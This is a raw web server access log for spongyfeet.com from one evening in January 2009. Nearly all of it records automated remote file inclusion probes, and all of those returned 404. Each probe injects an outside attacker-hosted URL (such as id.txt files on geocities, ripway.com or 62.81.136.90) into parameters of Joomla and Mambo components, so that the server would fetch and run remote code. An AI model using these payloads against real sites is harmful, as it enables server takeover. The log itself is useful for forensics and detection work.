193.207.106.54 - - [05/Jan/2009:22:50:41 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:22:52:50 -0800] "GET /logs/access_081222.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
203.34.37.16 - - [05/Jan/2009:22:54:00 -0800] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
203.34.37.16 - - [05/Jan/2009:22:54:00 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:22:55:43 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:22:55:44 -0800] "GET /logs/access_081221.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:22:55:49 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:22:56:38 -0800] "GET /logs/access_081215.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:58:27 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:58:27 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:58:34 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:58:34 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:23:00:05 -0800] "GET /logs/access_081226.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:23:00:06 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:23:00:07 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
70.86.113.106 - - [05/Jan/2009:23:01:26 -0800] "GET /logs/access_081222.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
70.86.113.106 - - [05/Jan/2009:23:01:26 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
70.86.113.106 - - [05/Jan/2009:23:01:26 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
70.86.113.106 - - [05/Jan/2009:23:01:33 -0800] "GET /logs/access_081226.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
62.146.68.47 - - [05/Jan/2009:23:03:22 -0800] "GET /logs/access_081226.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bamrecordsinc.com/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:23:03:58 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:23:04:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:23:04:44 -0800] "GET /logs/access_081220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:23:04:44 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
72.29.78.145 - - [05/Jan/2009:23:04:59 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
72.29.78.145 - - [05/Jan/2009:23:05:01 -0800] "GET /logs/access_081222.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
72.29.78.145 - - [05/Jan/2009:23:05:01 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
202.87.40.232 - - [05/Jan/2009:23:05:06 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
72.29.78.145 - - [05/Jan/2009:23:05:15 -0800] "GET /logs/access_081226.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:06:23 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:06:23 -0800] "GET /logs/access_081218.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:06:23 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:07:04 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:07:04 -0800] "GET /logs/access_081204.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:07:04 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:23:07:05 -0800] "GET /logs/access_081207.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
193.207.106.54 - - [05/Jan/2009:23:07:17 -0800] "GET /logs/access_081226.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:09:01 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:09:02 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:09:51 -0800] "GET /logs/access_081226.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:11:14 -0800] "GET /logs/access_081218.log%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:12:37 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:12:37 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:12:37 -0800] "GET /logs/access_081221.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:23:14:01 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:23:14:01 -0800] "GET /logs/access_081209.log//index.php?DOCUMENT_ROOT=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:23:14:01 -0800] "GET /index.php?DOCUMENT_ROOT=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:23:14:05 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:15:09 -0800] "GET /logs/access_081221.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:15:09 -0800] "GET /logs/access_081221.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:15:09 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:15:09 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:15:09 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:15:09 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:15:12 -0800] "GET /logs/access_081215.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:15:57 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:16:27 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:16:28 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:16:29 -0800] "GET /logs/access_081221.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
62.141.37.54 - - [05/Jan/2009:23:16:54 -0800] "GET /logs/access_081205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:23:17:01 -0800] "GET /logs/access_081220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:23:17:01 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:23:17:01 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:17:50 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:23:18:11 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:18:33 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:18:33 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
203.34.37.16 - - [05/Jan/2009:23:18:34 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
61.197.235.155 - - [05/Jan/2009:23:19:02 -0800] "HEAD /logs/access.log HTTP/1.0" 200 0 "http://e-jpic.co.jp/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:20:24 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:20:24 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:23:23:04 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:25:18 -0800] "GET /logs/access_081220.log//components/com_flyspray/startdown.php?file=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:25:18 -0800] "GET /components/com_flyspray/startdown.php?file=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:25:18 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
118.45.190.171 - - [05/Jan/2009:23:25:26 -0800] "GET /logs/access_081221.log//components/com_flyspray/startdown.php?file=http://6l0zt.com/technote7/data/group/member/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:26:02 -0800] "GET /logs/access_081207.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.spongyfeet.com"
89.218.85.18 - - [05/Jan/2009:23:26:02 -0800] "GET /logs/access_081207.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:29:14 -0800] "GET /logs/access_081209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:29:14 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
216.117.131.47 - - [05/Jan/2009:23:29:14 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://62.81.136.90/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:30:42 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:30:42 -0800] "GET /index.php?mosConfig_absolute_path=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
193.25.112.69 - - [05/Jan/2009:23:31:30 -0800] "GET /logs/access_081204.log//index.php?mosConfig_absolute_path=http://www.sassadeekorat.net/db/.../id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.spongyfeet.com"
208.36.144.9 - - [05/Jan/2009:23:32:22 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:35:07 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:35:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:23:35:07 -0800] "GET /logs/access_081222.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
208.98.1.107 - - [05/Jan/2009:23:35:54 -0800] "GET /logs/access_081221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.spongyfeet.com"
208.98.1.107 - - [05/Jan/2009:23:35:55 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.spongyfeet.com"
208.98.1.107 - - [05/Jan/2009:23:35:55 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.spongyfeet.com"
208.98.1.107 - - [05/Jan/2009:23:36:07 -0800] "GET /logs/access_081221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.spongyfeet.com"
208.98.1.107 - - [05/Jan/2009:23:36:07 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.spongyfeet.com"
208.98.1.107 - - [05/Jan/2009:23:36:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.spongyfeet.com"
216.153.214.235 - - [05/Jan/2009:23:36:32 -0800] "GET /logs/access_081205.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:36:58 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:36:58 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:23:36:58 -0800] "GET /logs/access_081218.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
